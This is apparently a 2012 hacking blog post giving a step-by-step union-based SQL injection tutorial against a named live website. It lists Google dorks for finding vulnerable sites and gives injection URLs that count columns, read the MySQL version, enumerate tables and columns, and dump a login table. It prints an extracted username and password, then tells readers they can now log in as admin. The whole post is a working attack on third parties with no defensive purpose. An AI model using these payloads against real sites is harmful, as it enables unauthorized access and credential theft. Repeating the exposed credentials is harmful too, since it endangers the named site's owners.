BASIC HACK

Tuesday 4 September 2012

SIMPLE QUERY BASED SQL INJECTION TUTORIAL

The soul purpose o fthis tutorial is to show you how to perform query based sql injection technique to retrive admin username and password.This is very easy once  you understand everything.this tutorial is only for mysql version>5

1st step is to find a sql vulnerable link.This type of link can be found by the following type of google dork

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="

all with out "
we are here taking the following site

http://www.dynamicinst.net/news.php?id=25


after finding this link  now we have to add a ' after 25 i.e
http://www.dynamicinst.net/news.php?id=25'

if the following link give some error such as
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
then it is vulnerable to sql injection

after that we have to verify the number of columns and this can be perfromed by hte following command

http://www.dynamicinst.net/news.php?id=25  order by 1 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 2 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 3 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 4 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 5 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 6 (error)

it means there are 5 columns in the database

Then we have to find the most vulnerable column.for this enter this command

http://www.dynamicinst.net/news.php?id=-25  union all select 1,2,3,4,5--

this will show this some number among 1,2,3,4,5
for this link it is 3 and 5.
suppose we select 3(you can also select 5)
N.B.
if we not place a negative sign before 25 then ot will show nothing

then we have to find the version of mysql.
http://www.dynamicinst.net/news.php?id=-25  union all select 1,2,@@version,4,5--
or
http://www.dynamicinst.net/news.php?id=-25  union all select 1,2,version(),4,5--
 output is  5.0.27

in this way you can find database name and  user of mysql by replacing version() with dabase() and user()


Then we  have to find all the table names

http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables--


output:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,careers,contacts,dealer_news,events,extranet_users,faq,login,manuals,myphpvote,news,product_type,products,solution

Our aim is to find the admin username and password.for this we have to select the appropiate table name among the above table names and here it is login

then we have to find all columns from login table

http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='login'--

 
if this not work convert login  to char form

http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(108 111 103 105 110 )--


but the previous command worked here.

outpur:
user,password

here we got the right column names.

then we have to extract user name and password from these columns.

http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,concat(user,0x3a,password),4,5 from login--


here 0x3a works as a separator

output:
Tom:Webb

here user=Tom
       password=Webb

We have successfully extracted the username and password .

now you can login as a admin.

For finding admin link of the website you an use 'Havij'   software

thank you...

1 comment: